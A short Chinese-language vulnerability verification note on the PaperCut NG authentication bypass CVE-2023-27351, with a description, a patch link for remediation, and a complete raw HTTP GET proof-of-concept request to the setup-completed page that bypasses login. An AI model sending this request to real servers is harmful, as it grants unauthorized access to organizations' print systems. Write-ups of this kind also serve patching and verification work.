漏洞验证-PaperCut NG 认证绕过 (CVE-2023-27351)

一、漏洞描述

PaperCut NG是澳大利亚PaperCut公司的一套下一代打印机控制软件。PaperCut NG 22.0.5版本存在授权问题漏洞，该漏洞源于身份验证不当，攻击者利用该漏洞可以绕过系统上的身份验证。

二、验证POC

GET /app?service=page/SetupCompleted HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive

三、验证截图

四、整改建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.papercut.com/kb/Main/PO-1216-and-PO-1219